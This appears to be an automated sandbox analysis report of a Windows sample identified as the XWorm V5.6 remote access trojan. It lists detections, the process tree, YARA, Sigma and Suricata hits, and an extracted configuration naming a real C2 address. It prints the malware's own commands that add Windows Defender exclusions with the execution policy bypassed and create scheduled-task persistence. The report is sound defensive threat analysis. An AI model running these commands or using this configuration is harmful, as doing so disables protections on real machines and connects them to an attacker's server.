Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1583457
MD5: f33eeceda472b6cc6b7880dbba4f4d1f
SHA1: f7aadb89b32d89f593b4c1064d29209496468460
SHA256: beeebb1db3f480c09137138d9d8e1cc9b114a927deb4b917d7c46e4e387f4a2a
Tags: NET, exe, MSIL, user-jstrosch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F33EECEDA472B6CC6B7880DBBA4F4D1F)
    • All function.exe (PID: 4400 cmdline: "C:\Users\user\AppData\Roaming\All function.exe" MD5: A23632476984A0D607DBF76B1096432F)
      • ALL slumzick.exe (PID: 6120 cmdline: "C:\Users\user\AppData\Roaming\ALL slumzick.exe" MD5: 735BD603CC2800BDB3972CC2B561E86A)
      • svchost.exe (PID: 7008 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
    • svchost.exe (PID: 512 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D378D7AF71086710318CDDA873D9348)
      • powershell.exe (PID: 3444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 736 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6828 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • svchost.exe (PID: 1196 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D378D7AF71086710318CDDA873D9348)
  • cleanup
{"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Roaming\svchost.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
      • 0xc74b:$str01: $VB$Local_Port
      • 0xc778:$str02: $VB$Local_Host
      • 0xac5f:$str03: get_Jpeg
      • 0xb2bf:$str04: get_ServicePack
      • 0xde10:$str05: Select * from AntivirusProduct
      • 0xe707:$str06: PCRestart
      • 0xe71b:$str07: shutdown.exe /f /r /t 0
      • 0xe7cd:$str08: StopReport
      • 0xe7a3:$str09: StopDDos
      • 0xe899:$str10: sendPlugin
      • 0xea19:$str12: -ExecutionPolicy Bypass -File "
      • 0xec88:$str13: Content-length: 5235
C:\Users\user\AppData\Roaming\svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      • 0xd5c5:$s6: VirtualBox
      • 0xd523:$s8: Win32_ComputerSystem
      • 0xf17d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf21a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf32f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xeba3:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings
00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
          • 0x301dd:$s6: VirtualBox
          • 0x4121d:$s6: VirtualBox
          • 0x3013b:$s8: Win32_ComputerSystem
          • 0x4117b:$s8: Win32_ComputerSystem
          • 0x31d95:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x42dd5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x31e32:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x42e72:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x31f47:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x42f87:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x317bb:$cnc4: POST / HTTP/1.1
          • 0x427fb:$cnc4: POST / HTTP/1.1
00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
            • 0xd3c5:$s6: VirtualBox
            • 0xd323:$s8: Win32_ComputerSystem
            • 0xef7d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xf01a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xf12f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xe9a3:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings
3.0.svchost.exe.950000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.0.svchost.exe.950000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
3.0.svchost.exe.950000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
                • 0xc74b:$str01: $VB$Local_Port
                • 0xc778:$str02: $VB$Local_Host
                • 0xac5f:$str03: get_Jpeg
                • 0xb2bf:$str04: get_ServicePack
                • 0xde10:$str05: Select * from AntivirusProduct
                • 0xe707:$str06: PCRestart
                • 0xe71b:$str07: shutdown.exe /f /r /t 0
                • 0xe7cd:$str08: StopReport
                • 0xe7a3:$str09: StopDDos
                • 0xe899:$str10: sendPlugin
                • 0xea19:$str12: -ExecutionPolicy Bypass -File "
                • 0xec88:$str13: Content-length: 5235
3.0.svchost.exe.950000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
                • 0xd5c5:$s6: VirtualBox
                • 0xd523:$s8: Win32_ComputerSystem
                • 0xf17d:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xf21a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xf32f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xeba3:$cnc4: POST / HTTP/1.1
2.2.All function.exe.38e6818.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

                  System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4576, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 6828, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4576, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 512, ProcessName: svchost.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 512, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 512, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 736, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 736, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4576, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 512, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 3444, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4576, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 512, ProcessName: svchost.exe

                  Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 512, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 736, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:12:05.630002+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:12.238570+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:17.745407+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:29.859822+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:41.956314+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:42.265305+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:51.510194+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:12:05.659317+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:17.747411+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:29.966060+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:41.959243+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP
2025-01-02T20:12:51.511184+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 54562 | 45.141.26.134 | 7000 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-02T20:12:12.238570+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP
2025-01-02T20:12:42.265305+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 45.141.26.134 | 7000 | 192.168.2.10 | 54562 | TCP

                  AV Detection

Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\All function.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\svchost.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["45.141.26.134"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\ALL slumzick.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\All function.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 91%
Source: file.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ALL slumzick.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\All function.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\svchost.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 45.141.26.134
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 7000
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <123456789>
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <Xwormmm>
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: XWorm V5.6
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: USB.exe
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: %AppData%
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | String decryptor: svchost.exe
Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_04d5f5f7-8
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr
                  Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr

                  Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.26.134:7000 -> 192.168.2.10:54562
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.10:54562 -> 45.141.26.134:7000
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.26.134:7000 -> 192.168.2.10:54562
Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 208.95.112.1 80
